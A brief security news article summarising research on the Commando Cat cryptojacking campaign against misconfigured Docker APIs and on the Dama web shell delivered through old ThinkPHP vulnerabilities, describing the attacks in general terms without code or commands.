Commando Cat, a threat actor known for its cunning tactics, has been linked to a sophisticated cryptojacking campaign. This campaign exploits poorly secured Docker instances to deploy cryptocurrency miners for financial gain. According to Trend Micro researchers, the attackers use a specific Docker image named cmd.cat/chattr to retrieve the payload from their command-and-control infrastructure. Initially documented by Cado Security, Commando Cat leverages the open-source Commando project to create seemingly benign containers that, once deployed, break out of their confines using the chroot command to gain access to the host operating system.
The attack process involves targeting misconfigured Docker remote API servers to deploy the malicious Docker image. The final step involves using commands like curl or wget to download the miner binary from a command-and-control server. This binary, suspected to be ZiggyStarTux, is based on the Kaiten malware. This approach allows attackers to exploit vulnerabilities in Docker configurations, evading detection by conventional security measures.
In a related disclosure, Akamai researchers highlighted a campaign exploiting years-old security flaws in ThinkPHP applications. Suspected to be orchestrated by a Chinese-speaking threat actor, this campaign delivers a web shell dubbed Dama. This web shell has advanced capabilities, including gathering system data, uploading files, and escalating privileges. The use of such sophisticated tools underscores an ongoing trend where attackers leverage web shells for advanced victim control, targeting a broad range of systems, not limited to those using ThinkPHP.